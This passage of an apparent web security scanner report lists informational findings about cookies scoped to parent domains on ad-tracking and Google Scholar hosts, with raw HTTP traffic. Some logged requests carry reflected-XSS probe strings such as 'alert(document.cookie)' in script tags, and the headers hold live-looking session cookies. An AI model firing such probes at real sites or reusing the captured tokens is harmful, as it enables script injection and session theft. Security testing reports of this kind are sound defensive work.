The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • d=ENMADqANq0itiBABlQEB8QWB0wCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA; expires=Sun, 24-Apr-2011 21:54:47 GMT; path=/; domain=.quantserve.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1748518845;fpan=1;fpa=P0-2130372027-1295906131971;ns=1;url=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D2290%2F2289%2F1%3Bs%3D788%3Bd%3D9%3Bw%3D300%3Bh%3D250;ref=http%3A%2F%2Fwww1.whdh.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1295906131970;tzo=360;a=p-02uqnnIGWyZdo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EO0ADqANq0itiBABlQEB7gWB8gCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=ENMADqANq0itiBABlQEB8QWB0wCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA; expires=Sun, 24-Apr-2011 21:54:47 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 24 Jan 2011 21:54:47 GMT
Server: QS


13.142. http://pixel.quantserve.com/seg/p-9dsZX-5zhUuTg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/p-9dsZX-5zhUuTg.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • d=EJEADqANq0itiBABswEB8gWB8wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA; expires=Mon, 25-Apr-2011 03:06:44 GMT; path=/; domain=.quantserve.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/p-9dsZX-5zhUuTg.js HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=ELIADqANq0itiBABswEB8QWB0wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EJEADqANq0itiBABswEB8gWB8wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA; expires=Mon, 25-Apr-2011 03:06:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "S18099:E0-1972111918-1295924804754"
Cache-Control: private, no-transform, max-age=600
Expires: Tue, 25 Jan 2011 03:16:44 GMT
Content-Length: 548
Date: Tue, 25 Jan 2011 03:06:44 GMT
Server: QS

function _qcdomain2(){
var d=document.domain;
if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
var a=d.split(".");var len=a.length;
if(len<3)return d;
var e=a[len-1];
if(e.length<3)return
...[SNIP]...

13.143. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1%263615%3D1; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.rubiconproject.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=3615 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; ruid=154d290e46adc1d6f373dd09^3^1294539219^2915161843; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; khaos=GIPAEQ2D-C-IOYY; lm="9 Jan 2011 02:15:20 GMT"; cd=false; put_2081=CA-00000000456885722; rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1; rpx=4210%3D8945%2C0%2C1%2C%2C%264214%3D8945%2C0%2C1%2C%2C%264894%3D8945%2C0%2C1%2C%2C%264939%3D8946%2C0%2C1%2C%2C%265671%3D9034%2C0%2C1%2C%2C%262372%3D9034%2C0%2C1%2C%2C%262190%3D9034%2C0%2C1%2C%2C%262374%3D9034%2C0%2C1%2C%2C%262399%3D9257%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1%263615%3D1; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4210%3D8945%2C0%2C1%2C%2C%264214%3D8945%2C0%2C1%2C%2C%264894%3D8945%2C0%2C1%2C%2C%264939%3D8946%2C0%2C1%2C%2C%265671%3D9034%2C0%2C1%2C%2C%262372%3D9034%2C0%2C1%2C%2C%262190%3D9034%2C0%2C1%2C%2C%262374%3D9034%2C0%2C1%2C%2C%262399%3D9257%2C0%2C1%2C%2C%263615%3D9329%2C0%2C1%2C%2C; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.144. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:46 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESED6m9hESeuo-2i0GmZeSEfo&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=4&mpid=1051202&fpid=3&rnd=3797505172801460594&nu=n&sp=y
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14999%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:46 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 01:35:45 GMT

GIF89a.............!.......,...........D..;

13.145. http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • C2=cHgPNJpwIg02FsGCdbdBrhgohXwawOoAM/oROK7YDwAoGX7r1VQcKa8mGKGBI9YRVP53FkL3Fy5gPbw6TVIwsu2B/0mBOea7IIaWGsmgigQvJVAc; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
  • ROLL=v5Q2U0M!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
  • 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
  • 5764026402=_4d3dea59,5764026402,772178^924994^87^0,1_; domain=advertising.com; path=/click
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ACID=Bc330012940999670074; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; ROLL=v5Q2V0M9itzqEXE!;

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 24 Jan 2011 22:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=cHgPNJpwIg02FsGCdbdBrhgohXwawOoAM/oROK7YDwAoGX7r1VQcKa8mGKGBI9YRVP53FkL3Fy5gPbw6TVIwsu2B/0mBOea7IIaWGsmgigQvJVAc; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
Set-Cookie: 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
Set-Cookie: 5764026402=_4d3dea59,5764026402,772178^924994^87^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:49:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

13.146. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • C2=kcfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
  • F1=BQy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
  • BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
  • ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
  • 49004778=_4d3df724,5208681003,772178^924994^87^0,0_; domain=advertising.com; path=/click
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:03:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Date: Mon, 24 Jan 2011 22:03:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=kcfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: F1=BQy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: 49004778=_4d3df724,5208681003,772178^924994^87^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cs
...[SNIP]...

13.147. http://rcm.amazon.com/e/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-token=Z2JSK2RoUn+3UMHwG7/GMLAwP03jsMX2IupgD8XjIWL/cWEmFwNPxyjc+zvmeSxHFRri2WjEoaTthJUtEq8EAL61ozW8DRERMFViffbf4t9K0iQzlFKBaFiYf9vzLMP7fsKMskc0pEdBhkFJzjZjmTFuuFcjAIQqpefiCQpUp1OGTQNkcOqpUWmgyA0iAScPLbkwsq14aJ6RQliVt1HPt64kToJxXKmZWZXgpLdM8HZ79M0ij5nOCXDOxmXxRdkg; ubid-main=184-7948791-6690213; session-id-time=2082787201l; session-id=175-4977389-9084947; apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:01 GMT
Server: Server
Set-Cookie: apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 4168
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...

13.148. http://rd.apmebf.com/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/pg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 01:35:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/pg?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fks3qs-58150-1294536375707-a5

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 01:35:48 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/pg?cont_id=11&amp;
...[SNIP]...

13.149. http://scholar.google.com/schhp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=b5f8ca2c9be5aa39:TM=1295884935:LM=1295884935:S=AsqWh3wvXaOvonOV; expires=Wed, 23-Jan-2013 16:02:15 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=b5f8ca2c9be5aa39; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=b5f8ca2c9be5aa39:TM=1295884935:LM=1295884935:S=AsqWh3wvXaOvonOV; expires=Wed, 23-Jan-2013 16:02:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:15 GMT
Server: scholar
Expires: Mon, 24 Jan 2011 16:02:15 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><title>Google Scholar</title><style>body,td,a,p,.h{font-family:arial,sans-ser
...[SNIP]...

13.150. http://scholar.google.com/scholar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /scholar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=ba854cced93b2364:TM=1295884936:LM=1295884936:S=HAc13nrthyumpJSW; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://scholar.google.com/schhp?hl=en&as_sdt=0,9
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=ba854cced93b2364; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=ba854cced93b2364:TM=1295884936:LM=1295884936:S=HAc13nrthyumpJSW; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: scholar
Content-Length: 249
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://scholar.google.com/schhp?
...[SNIP]...

13.151. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

